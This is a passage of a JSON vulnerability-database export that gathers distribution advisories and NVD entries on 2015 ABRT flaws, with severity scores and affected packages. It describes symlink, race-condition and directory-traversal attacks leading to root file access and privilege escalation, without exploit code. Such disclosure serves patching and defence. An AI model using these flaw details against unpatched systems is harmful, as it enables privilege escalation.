links\n- avoid race-conditions in dump dir opening\n- Resolves: #1212096, #1217499, #1218610, #1217484", "cvss3": {}, "published": "2015-06-09T00:00:00", "type": "oraclelinux", "title": "abrt security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-09T00:00:00", "id": "ELSA-2015-1083", "href": "http://linux.oracle.com/errata/ELSA-2015-1083.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "abrt is a tool to help users to detect defects in applications and to create a bug report with all information needed by maintainer to fix it. It uses plugin system to extend its functionality. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-21T00:33:50", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: abrt-2.6.0-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-21T00:33:50", "id": "FEDORA:01B586251304", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FUTUTTO5RXFINO22YZSDQGFFCQSEPSXP/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "abrt is a tool to help users to detect defects in applications and to create a bug report with all information needed by maintainer to fix it. It uses plugin system to extend its functionality. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-30T20:20:27", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: abrt-2.3.0-7.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-30T20:20:27", "id": "FEDORA:F176B604CD06", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FAUKTOCKKHYNGGW6KZIN73ZFYIPFSKMC/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A GNOME application allows users to browse through detected problems and provides them with convenient way for managing these problems. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-21T00:33:50", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: gnome-abrt-1.2.0-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-21T00:33:50", "id": "FEDORA:E37216205E95", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4WSJZIVP6GWGBZYCJAQVGXO33T44A6MS/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "A GNOME application allows users to browse through detected problems and provides them with convenient way for managing these problems. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-30T20:20:27", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: gnome-abrt-1.0.0-3.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-30T20:20:27", "id": "FEDORA:E13A7604B3B3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EIFNDXUCWW46V3S7GLIEO3F4R54YGYAN/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Satyr is a library that can be used to create and process microreports. Microreports consist of structured data suitable to be analyzed in a fully automated manner, though they do not necessarily contain sufficient informa tion to fix the underlying problem. The reports are designed not to contain any potentially sensitive data to eliminate the need for review before submissi on. Included is a tool that can create microreports and perform some basic operations on them. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-21T00:33:50", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: satyr-0.18-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-21T00:33:50", "id": "FEDORA:21BC16205E95", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3UMR7X4LNHV7ISOMMETCTLSOC7U52BMT/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Libraries providing API for reporting different problems in applications to different bug targets like Bugzilla, ftp, trac, etc... ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-21T00:33:50", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: libreport-2.6.0-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-21T00:33:50", "id": "FEDORA:140466254743", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7FAWQFQ6HDN2XPLTG5ZBX64QSZTBSPF6/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Libraries providing API for reporting different problems in applications to different bug targets like Bugzilla, ftp, trac, etc... ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-30T20:20:27", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: libreport-2.3.0-8.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-30T20:20:27", "id": "FEDORA:0B64D604E832", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TENJEMFYZQOGL5ZGR75Y2XGVSZ4QZJXU/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:45:48", "description": "ABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the information\nneeded by a maintainer to fix it. It uses a plug-in system to extend its\nfunctionality. \n\nIt was found that ABRT was vulnerable to multiple race condition and \nsymbolic link flaws. A local attacker could use these flaws to potentially \nescalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by \nABRT wrote core dumps to files owned by other system users. This could \nresult in information disclosure if an application crashed while its \ncurrent directory was a directory writable to by other users (such as \n/tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT \ndid not handle symbolic links correctly. A local attacker with write access \nto an ABRT problem directory could use this flaw to escalate their \nprivileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an \nsosreport file in ABRT problem directories, and included excerpts of \n/var/log/messages selected by the user-controlled process name, leading to \nan information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain \ndirectories, abrt-handle-upload did not verify that the new problem \ndirectory had appropriate permissions and did not contain symbolic links. \nAn attacker able to create a crafted problem report could use this flaw to \nexpose other parts of ABRT to attack, or to overwrite arbitrary files on\nthe system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus \nservice. A local attacker could use these flaws to read and write arbitrary \nfiles as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check \nthe validity of the problem directory argument in the ChownProblemDir, \nDeleteElement, and DeleteProblem methods. A local attacker could use this \nflaw to take ownership of arbitrary files and directories, or to delete\nfiles and directories as the root user. (CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache \nhelper program did not properly filter the process environment before \ninvoking abrt-action-install-debuginfo. A local attacker could use this \nflaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which \ncorrect these issues.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-09T00:00:00", "type": "redhat", "title": "(RHSA-2015:1083) Important: abrt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2018-04-11T23:32:41", "id": "RHSA-2015:1083", "href": "https://access.redhat.com/errata/RHSA-2015:1083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2023-01-01T04:43:36", "description": "**CentOS Errata and Security Advisory** CESA-2015:1083\n\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the information\nneeded by a maintainer to fix it. It uses a plug-in system to extend its\nfunctionality. \n\nIt was found that ABRT was vulnerable to multiple race condition and \nsymbolic link flaws. A local attacker could use these flaws to potentially \nescalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by \nABRT wrote core dumps to files owned by other system users. This could \nresult in information disclosure if an application crashed while its \ncurrent directory was a directory writable to by other users (such as \n/tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT \ndid not handle symbolic links correctly. A local attacker with write access \nto an ABRT problem directory could use this flaw to escalate their \nprivileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an \nsosreport file in ABRT problem directories, and included excerpts of \n/var/log/messages selected by the user-controlled process name, leading to \nan information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain \ndirectories, abrt-handle-upload did not verify that the new problem \ndirectory had appropriate permissions and did not contain symbolic links. \nAn attacker able to create a crafted problem report could use this flaw to \nexpose other parts of ABRT to attack, or to overwrite arbitrary files on\nthe system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus \nservice. A local attacker could use these flaws to read and write arbitrary \nfiles as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check \nthe validity of the problem directory argument in the ChownProblemDir, \nDeleteElement, and DeleteProblem methods. A local attacker could use this \nflaw to take ownership of arbitrary files and directories, or to delete\nfiles and directories as the root user. (CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache \nhelper program did not properly filter the process environment before \ninvoking abrt-action-install-debuginfo. A local attacker could use this \nflaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which \ncorrect these issues.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-June/070645.html\n\n**Affected packages:**\nabrt\nabrt-addon-ccpp\nabrt-addon-kerneloops\nabrt-addon-pstoreoops\nabrt-addon-python\nabrt-addon-upload-watch\nabrt-addon-vmcore\nabrt-addon-xorg\nabrt-cli\nabrt-console-notification\nabrt-dbus\nabrt-desktop\nabrt-devel\nabrt-gui\nabrt-gui-devel\nabrt-gui-libs\nabrt-libs\nabrt-python\nabrt-python-doc\nabrt-retrace-client\nabrt-tui\nlibreport\nlibreport-anaconda\nlibreport-centos\nlibreport-cli\nlibreport-compat\nlibreport-devel\nlibreport-filesystem\nlibreport-gtk\nlibreport-gtk-devel\nlibreport-newt\nlibreport-plugin-bugzilla\nlibreport-plugin-kerneloops\nlibreport-plugin-logger\nlibreport-plugin-mailx\nlibreport-plugin-mantisbt\nlibreport-plugin-reportuploader\nlibreport-plugin-rhtsupport\nlibreport-plugin-ureport\nlibreport-python\nlibreport-rhel\nlibreport-rhel-anaconda-bugzilla\nlibreport-rhel-bugzilla\nlibreport-web\nlibreport-web-devel\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1083", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-15T19:59:49", "type": "centos", "title": "abrt, libreport security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2015-06-15T19:59:49", "id": "CESA-2015:1083", "href": "https://lists.centos.org/pipermail/centos-announce/2015-June/070645.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:25:52", "description": "daemon/abrt-handle-upload.in in Automatic Bug Reporting Tool (ABRT), when moving problem reports from /var/spool/abrt-upload, allows local users to write to arbitrary files or possibly have other unspecified impact via a symlink attack on (1) /var/spool/abrt or (2) /var/tmp/abrt.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-01-14T18:15:00", "type": "cve", "title": "CVE-2015-3147", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.9, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3147"], "modified": "2020-01-21T15:47:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:-", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.1", "cpe:/o:redhat:enterprise_linux_server_aus:7.7", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.7", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:redhat:enterprise_linux_server_tus:7.7", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:redhat:enterprise_linux_server_tus:7.6"], "id": "CVE-2015-3147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3147", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:26:04", "description": "The abrt-action-install-debuginfo-to-abrt-cache help program in Automatic Bug Reporting Tool (ABRT) does not properly handle the process environment before invoking abrt-action-install-debuginfo, which allows local users to gain privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T18:15:00", "type": "cve", "title": "CVE-2015-3159", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3159"], "modified": "2020-01-21T15:40:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:-"], "id": "CVE-2015-3159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3159", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:28:38", "description": "Automatic Bug Reporting Tool (ABRT) allows local users to read, change the ownership of, or have other unspecified impact on arbitrary files via a symlink attack on (1) /var/tmp/abrt/*/maps, (2) /tmp/jvm-*/hs_error.log, (3) /proc/*/exe, (4) /etc/os-release in a chroot, or (5) an unspecified root directory related to librpm.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-26T15:29:00", "type": "cve", "title": "CVE-2015-3315", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3315"], "modified": "2018-02-19T02:29:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:-"], "id": "CVE-2015-3315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3315", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:04:14", "description": "The default event handling scripts in Automatic Bug Reporting Tool (ABRT) allow local users to gain privileges as demonstrated by a symlink attack on a var_log_messages file.", 